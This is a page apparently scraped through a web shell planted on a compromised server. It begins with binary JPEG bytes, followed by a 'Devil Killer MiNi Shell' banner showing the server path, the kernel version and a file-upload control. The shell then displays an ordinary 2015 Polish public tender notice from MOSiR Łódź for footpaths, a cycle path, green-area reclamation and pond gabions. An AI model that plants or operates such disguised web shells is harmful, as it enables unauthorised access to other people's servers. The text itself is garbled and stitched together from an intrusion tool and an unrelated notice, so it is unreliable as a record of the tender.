JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150224/25023-N-2015.html

<p class="kh_header"><b>Łódź: Wykonanie ścieżek pieszych i pieszo - rowerowej, oraz porządkowanie terenu w ramach zadania: Stawy Jana Od nowa - II etap</b><br>
<b>Numer ogłoszenia: 25023 - 2015; data zamieszczenia: 24.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Ks. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 42 27 21 417, faks 42 6367980.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie ścieżek pieszych i pieszo - rowerowej, oraz porządkowanie terenu w ramach zadania: Stawy Jana Od nowa - II etap.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania jest: 

Część 1
PROJEKTOWE ROZWIĄZANIA SYTUACYJNE I WYSOKOŚCIOWE

Parametry i geometria:
Szerokość ścieżki 2,0m (ścieżka piesza prowadząca od wjazdu na posesję do ścieżki utwardzonej wzdłuż stawu - promenady) i 4,0m (ścieżka pieszo - rowerowa o wzmocnionej podbudowie biegnąca od parkingu do mostu).

Ze względu na charakter inwestycji, jakim jest przebudowa na większości odcinka geometria została dostosowana do istniejącego zagospodarowania terenu oraz dostępności terenu (w tym własności działek).

Chodnik i alejki w planie będą posiadały układ zbliżony do istniejącego. 
Pochylenie podłużne chodników nie powinno przekraczać 6%. 

Układ wysokościowy został rozwiązany z uwzględnieniem poziomów terenów przyległych, istniejącej zabudowy i uzbrojenia podziemnego. 
Nawierzchnia chodnika będzie posiadała spadek poprzeczny od 1% do 2% w kierunku nawierzchni. Dla odcinków bezpośrednio przyległych do zieleńców spadek poprzeczny należy ukształtować w kierunku przyległych terenów. 

W przypadku dużych różnic wysokości pomiędzy projektowaną nawierzchnią a terenem istniejącym możliwa jest korekta układu wysokościowego ciągów pieszych (niweleta i spadki poprzeczne) w celu prawidłowego dowiązania go do istniejącego terenu. 

Szczegółowe rozwiązania geometryczne pokazane są na projekcie zagospodarowania terenu, szkicu tyczenia i przekroju konstrukcyjno-normalnym.

ODWODNIENIE 
Nawierzchnie alejek należy wykonać, stosując spadki gwarantujące sprawne odprowadzenie wód opadowych. 

Wody opadowe będą odprowadzone powierzchniowo na przyległe zieleńce.

PROJEKTOWANA KONSTRUKCJA NAWIERZCHNI
Konstrukcja nawierzchni ścieżki pieszej
- warstwa ścieralna z kostki betonowej niefazowanej w kolorze szarym (cegła) 	-   8.0 cm
- podsypka cementowo - piaskowa 1:4						-   3.0 cm
- podbudowa z kruszywa łamanego 0/31.5 stabilizowanego mech.			-  15.0 cm
ilość ścieżek do wykonania 220 mb - szerokość 2,00 m

Konstrukcja nawierzchni ścieżki pieszojezdnej
- warstwa ścieralna z kostki betonowej niefazowanej w kolorze szarym (cegła) 	-   8.0 cm
- podsypka cementowo - piaskowa 1:4						-   3.0 cm
- Podbudowa betonowa z dylatacja - grubość warstwy po zagęszczeniu 		- 12.0 cm 
ilość ścieżek do wykonania 400 mb - szerokość 4,00 m

Konstrukcja obrzeży
W krawędzi chodników i alejek należy wykonać obrzeża 8x30x100 cm ustawione na podsypce cementowo piaskowej grubości 5 cm. Ze względu na odprowadzenie wody obrzeża wykonać równo z nawierzchnią chodników, ścieżki i ciągu, lecz wyniesione co najmniej +5cm ponad przyległe tereny. W miejscach gdzie zieleńce są znacznie wyniesione ponad istniejącą nawierzchnie dopuszcza się ustawienie obrzeża ponad projektowane nawierzchnie pod warunkiem sprawnego odprowadzenia wód opadowych.

ROBOTY ZIEMNE
Podczas realizacji inwestycji wystąpią roboty ziemne jako wykopy i korytowanie pod nowe konstrukcje nawierzchni chodnika.
Roboty ziemne, w rejonie przebiegu ciągów kablowych energetycznych oraz sieci wodociągowych i kanalizacyjnych należy wykonać pod nadzorem służb odpowiednich gestorów.
W miejscach występowania trawników wykonawca robót drogowych pozostawi teren obniżony o min. 10 cm w celu wypełnienia glebą urodzajną i obsiania trawą.
Podczas prowadzenia robót należy zabezpieczyć widoczną armaturę uzbrojenia podziemnego (np. włazy kanalizacyjne, zasuwy i studnie telekomunikacyjne) przed uszkodzeniem lub zniszczeniem.
Podczas prowadzenia robót należy zabezpieczyć przyległe tereny zielone przed zniszczeniem, albo odtworzyć je po zakończeniu robót.

KOLIZJE
Kolizje branży energetycznej

Przebudowa chodnika i pozostałych elementów, może wymagać zabezpieczenia istniejącego kabla energetycznego. Rozwiązania techniczne ewentualnej przebudowy i zabezpieczenia linii energetycznej należy wykonać zgodnie z zaleceniami gestora sieci.

Kolizje branży wodociągowej 
Przebudowa chodnika i pozostałych elementów, może wymagać zabezpieczenia istniejącej sieci wodociągowej. Rozwiązania techniczne ewentualnej przebudowy i zabezpieczenia sieci wodociągowej należy wykonać zgodnie z zaleceniami gestora sieci.

Uwaga:
W miejscach zbliżenia do istniejącego uzbrojenia roboty należy wykonywać ręcznie bez użycia sprzętu ciężkiego.

W trakcie prowadzenia robót należy sprawdzić metodą odkrywkową stan zabezpieczenia uzbrojenia podziemnego (kable energetyczne, sieć teletechniczna) przebiegającego pod powierzchnią zjazdów, miejsc postojowych, nawierzchni jezdni. 
W przypadku stwierdzenia nienależytego zabezpieczenia uzbrojenia należy w uzgodnieniu i pod nadzorem gestora sieci wykonać roboty dodatkowe mające na celu właściwe zabezpieczenie w/w uzbrojenia. Prace te wymagają akceptacji nadzoru inwestorskiego.

Kontroli odkrywkowej i ewentualnego zabezpieczenia wymagać będzie następujące uzbrojenie: 
- kable energetyczne 
- sieć wodociągowa
Wszelkie prace przy uzbrojeniu terenu wymagają wcześniejszego zgłoszenia gestorowi sieci oraz bieżącego nadzoru wyznaczonego pracownika właściciela uzbrojenia.
Szerokość ścieżki północnej na całej długości została poszerzona do 4 m. Przewiduje się na niej sporadyczny ruch samochodowy (w tym samochodów ciężarowych). W związku z tym podbudowę należy wzmocnić np. warstwą suchego betonu.

Zamawiający załączył przedmiar robót w którym należy zmienić wartości w pozycjach:
Poz. 7 d.2 - pominąć
Poz. 8 d. 2 - pominąć
Poz. 10 d.2 - pominąć
Poz. 12 d.2  - do skorygowania w związku ze zmniejszonym zakresem robót o poz. 8 i 10 d.2
Poz. 13 d.3 - 	zamiast 380 należy przyjąć 400
		zamiast 629 należy przyjąć 220
Poz. 14 d.3 - należy skorygować do ilości ścieżek wg wskazań w poz. 13 d.3
Poz. 19 d.5 - zamiast krawężników należy przyjąć 800 m obrzeży betonowych 30 x 8
Poz. 20 d.5 - zamiast 629 należy przyjąć 220
Poz. 21 d.5 - zamiast 629 należy przyjąć 220
Poz. 22 d.5 - zamiast 2778 należy przyjąć 2040
Poz. 24 d.6 - zamiast 1600 należy przyjąć 620
Poz. 25 d.6 - zamiast 1600 należy przyjąć 620
Poz. 26 d.7 - zamiast 38 należy przyjąć 10


Część 2
Rekultywacja terenów zielonych
Zakres inwestycji obejmuje wyrównanie terenów zielonych wokół ścieżek i obsianie ich trawą parkową, w sumie ok 2 500 m2. Do wykonania są nasadzenia drzew iglastych o wysokości min 1,5 m w ilości 58 sztuk. 

Rekultywacja czaszy stawu
Zakres inwestycji obejmuje wykonanie przegród gabionowych poprzez ustawienie trzech linii gabionów (koszy siatkowo-kamiennych) w czaszy stawu. 

Pierwsza linia gabionów (oznaczona jako A) zlokalizowana ok. 28m poniżej wlotu rzeki Olechówki do Stawów utworzy osadnik, w którym będzie zatrzymywane rumowisko dostarczane do zbiornika z wodami rzeki Olechówki. Korona przegrody będzie zlokalizowana 10cm poniżej lustra wody przy Normalnym Poziomie Piętrzenia (NPP=186,05 m npm), co zapewni swobodny przepływ wody ponad nią. 

Druga i trzecia linia gabionów B i C oraz D i E (między którymi przestrzeń będzie zasypana gruntem) będzie tworzyć wypłycenie dla roślinności szuwarowej. 
Dolna powierzchnia (spód) gabionów będzie zagłębiona ok 0,5m-1,5m poniżej dna stawu. Górna powierzchnia gabionów (korona) będzie znajdować się poniżej lustra wody w stawie. Dla pierwszej linii gabionów zagłębienie poniżej lustra wody w stawie (NPP = 186,05 m npm) będzie wynosić 10cm (rzędna korony gabionów będzie wynosić 185,95 m npm), dla drugiej 25cm (185,80 m npm), a dla trzeciej 35cm (185.70 m npm). 

Ponadto w ramach przedsięwzięcia zostanie utworzona dolomitowa struktura geochemiczna, która będzie się składać z kamienia dolomitowego ułożonego na dnie stawu pomiędzy pierwszą (A) i drugą (B) linią gabionów. Projektowana ilość kamienia do ułożenia w dnie jest niewielka i wynosi ok. 1kg/m2 powierzchni stawu. 

Dla umożliwienia migracji organizmów wodnych oraz dla sprawnego napełniania i opróżniania czaszy stawu z wody, w przegrodach gabionowych mają zostać wykonane przepusty z rur strukturalnych PP o średnicy 600mm. Przepusty te będą mogły być w zależności od potrzeb zamykane (za pomocą firmowych zaślepek - korków oferowanych przez producentów tego typu rur) w celu uzyskania jak najbardziej wydajnej pracy projektowanego systemu (najlepszego efektu ekologicznego, w tym oczyszczania wody). 

UWAGA:
Inwestor oddaje do dyspozycji wykonawcy kosze (gabiony) oraz kamień hydrotechniczny do wypełnienia koszy.


Powyższe opracowania dla części 1 i części 2 zostały zamieszczone w PDF na stronie internetowej jako część załączników do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.00-1, 45.23.31.61-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.2.1.	Dotyczy części 1.
Wykonawca musi udokumentować, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej:
- jedną robotę której przedmiotem było wykonanie robót drogowych (ścieżki, drogi) o powierzchni minimum 500 m2.
Uwaga: 
1)	W przypadku, gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić te roboty rodzajowo i powierzchniowo.
2)	Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Nardowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje sie średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.
5.1.2.2.	Dotyczy części 2.
Wykonawca musi udokumentować, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej:
- jedną robotę polegającą na urządzaniu terenów zielonych o powierzchni co najmniej 1000 m2.
Uwaga: 
1)	W przypadku, gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym zakresie, Wykonawca zobowiązany jest wyodrębnić te roboty rodzajowo i powierzchniowo.
2)	Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Nardowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje sie średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.4.1.	Dotyczy części 1 i części 2.
Wykonawca winien wykazać, że dysponuje lub będzie dysponował: 
- jedną osobą do pełnienia funkcji kierownika robót posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej (obecne brzmienie nazwy specjalności) lub równoważne nadane na podstawie wcześniej obowiązujących przepisów.
Uwaga:
1.	Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą z dnia 
7 lipca 1994r. Prawo budowlane (Dz. U. z 2010r. Nr 243, poz.1623 ze zm.) 
oraz Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. 
z 2006r. Nr 83, poz.578 ze zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów, upoważniające do kierowania robotami w zakresie objętym niniejszym zamówieniem.
2.	W przypadku Wykonawców zagranicznych, dopuszcza się również kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. 
o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008, Nr 63 poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian. Zakres i warunki zmian zawartej umowy oraz pozostałe kwestie związane z umową zostały określone we wzorze umowy stanowiącym załącznik nr 8 do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://mosirl.bip.eur.pl/public/?id=100855<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Łodzi 
90-532 Łódź, ul. ks. Skorupki 21 
Dział Ogólny pokój 256..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2015 godzina 09:55, miejsce: Miejski Ośrodek Sportu i Rekreacji w Łodzi 
90-532 Łódź, ul. ks. Skorupki 21 
Sekretariat pokój 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie ścieżek pieszych i pieszo-rowerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1
PROJEKTOWE ROZWIĄZANIA SYTUACYJNE I WYSOKOŚCIOWE

Parametry i geometria:
Szerokość ścieżki 2,0m (ścieżka piesza prowadząca od wjazdu na posesję do ścieżki utwardzonej wzdłuż stawu - promenady) i 4,0m (ścieżka pieszo - rowerowa o wzmocnionej podbudowie biegnąca od parkingu do mostu).

